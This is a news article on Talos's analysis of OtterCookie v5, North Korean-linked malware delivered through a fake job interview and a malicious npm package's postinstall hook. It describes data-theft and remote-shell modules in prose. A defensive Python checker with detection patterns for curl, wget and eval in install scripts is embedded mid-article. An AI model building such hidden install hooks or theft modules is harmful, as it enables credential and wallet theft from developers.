    The activity detected by Cisco Talos concerns an organization headquartered in Sri Lanka. It’s assessed that the company was not intentionally targeted by the threat actors; rather, one of its systems was infected, likely after a user fell victim to a fake job offer that instructed them to install a trojanized Node.js application called Chessfi, hosted on Bitbucket, as part of the interview process.

    Interestingly, the malicious software declares a dependency on a package called “node-nvm-ssh” published to the official npm repository on August 20, 2025, by a user named “trailer.” The package attracted a total of 306 downloads before it was taken down by the npm maintainers six days later.

    It’s also worth noting that the npm package in question is one of the 338 malicious Node libraries flagged earlier this week by software supply chain security company Socket as connected to the Contagious Interview campaign.

    The package, once installed, triggers the malicious behavior by means of a postinstall hook in its package.json file that’s configured to run a custom script called “skip” so as to launch a JavaScript payload (“index.js”), which, in turn, loads another JavaScript (“file15.js”) responsible for executing the final-stage malware.
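The install-time trigger described above is worth checking for mechanically before any dependency is installed: npm runs the preinstall, install, postinstall and prepare scripts automatically, and an indirection such as postinstall → `npm run skip` → `node index.js` is easy to miss when reading package.json by eye. The Python below is an added example written for this page, not Talos's code and not the malicious package itself; the two package.json documents are constructed (one mirrors the hook-to-“skip”-to-index.js shape the article describes, the other is a typical native-module build), and the indicator patterns are assumptions for illustration rather than a vetted ruleset.

```python
"""Audit npm lifecycle scripts for install-time execution chains.
Added example; the package.json samples and indicator regexes are constructed."""
import json
import re
from typing import Dict, List, Optional, Set

# Scripts npm runs on its own during `npm install`, in firing order.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Things an install hook rarely needs to do for a legitimate build.
# Assumed indicators for illustration, not a complete detection ruleset.
SUSPICIOUS = {
    "executes a script file": re.compile(r"\bnode\s+\S+\.js\b"),
    "fetches remote content": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b"),
    "encoded or inline code": re.compile(r"\b(base64|eval|atob)\b|\s-e\s+['\"]"),
}


def resolve_script(scripts: Dict[str, str], name: str,
                   seen: Optional[Set[str]] = None) -> List[str]:
    """Follow `npm run <x>` indirections until concrete commands are reached.

    Returns every command on the chain, cycle-safe, so a hook that only says
    `npm run skip` is judged by what `skip` actually executes.
    """
    if seen is None:
        seen = set()
    if name in seen or name not in scripts:
        return []
    seen.add(name)
    cmd = scripts[name]
    chain = [cmd]
    for target in re.findall(r"\bnpm\s+run\s+([\w:-]+)", cmd):
        chain += resolve_script(scripts, target, seen)
    return chain


def audit_package(package_json: str) -> List[str]:
    """Report install-time hooks whose resolved commands match an indicator."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        if hook not in scripts:
            continue
        for cmd in resolve_script(scripts, hook):
            for why, pattern in SUSPICIOUS.items():
                if pattern.search(cmd):
                    findings.append(f"{hook}: {why}: {cmd}")
    return findings


# Constructed sample mirroring the shape described above: the hook hides
# behind a custom script name, which then launches a JavaScript file.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-ssh-helper",
  "version": "1.0.3",
  "scripts": {
    "postinstall": "npm run skip",
    "skip": "node index.js",
    "test": "echo ok"
  }
}"""

# Constructed benign sample: a native addon rebuilding itself on install.
BENIGN_PACKAGE_JSON = """{
  "name": "example-native-addon",
  "version": "2.0.0",
  "scripts": { "install": "node-gyp rebuild" }
}"""

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_PACKAGE_JSON), ("benign", BENIGN_PACKAGE_JSON)):
        print(name, audit_package(doc) or "no findings")
```

Such a check only narrows what to read; the safer operational control is to install with `npm install --ignore-scripts` and run any genuinely required build steps deliberately afterwards.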

    Further analysis of the tool used in the attack has found that “it had characteristics of BeaverTail and of OtterCookie, blurring the distinction between the two,” security researchers Vanja Svajcer and Michael Kelley said, adding it incorporated a new keylogging and screenshotting module that uses legitimate npm packages like “node-global-key-listener” and “screenshot-desktop” to capture keystrokes and take screenshots, respectively, and exfiltrate the information to the C2 server.

    At least one version of this new module comes equipped with an auxiliary clipboard monitoring feature to siphon clipboard content. The emergence of the new version of OtterCookie paints a picture of a tool that has evolved from basic data-gathering to a modular program for data theft and remote command execution.


    Also present in the malware, codenamed OtterCookie v5, are functions akin to BeaverTail to enumerate browser profiles and extensions, steal data from web browsers and cryptocurrency wallets, install AnyDesk for persistent remote access, as well as download a Python backdoor referred to as InvisibleFerret.

    Some of the other modules present in OtterCookie are listed below –

    • Remote shell module, which sends system information and clipboard content to the C2 server and installs the “socket.io-client” npm package to connect to a specific port on the OtterCookie C2 server and receive further commands for execution
    • File uploading module, which systematically enumerates all drives and traverses the file system in order to find files matching certain extensions and naming patterns (e.g., metamask, bitcoin, backup, and phrase) to be uploaded to the C2 server
    • Cryptocurrency extensions stealer module, which extracts data from cryptocurrency wallet extensions installed on Google Chrome and Brave browsers (the list of extensions targeted partially overlaps with that of BeaverTail)

    Furthermore, Talos said it detected a Qt-based BeaverTail artifact and a malicious Visual Studio Code extension containing BeaverTail and OtterCookie code, raising the possibility that the group may be experimenting with new methods of malware delivery.

    “The extension could also be a result of experimentation from another actor, possibly even a researcher, who is not associated with Famous Chollima, as this stands out from their usual TTPs,” the researchers noted.


    Source: thehackernews.com…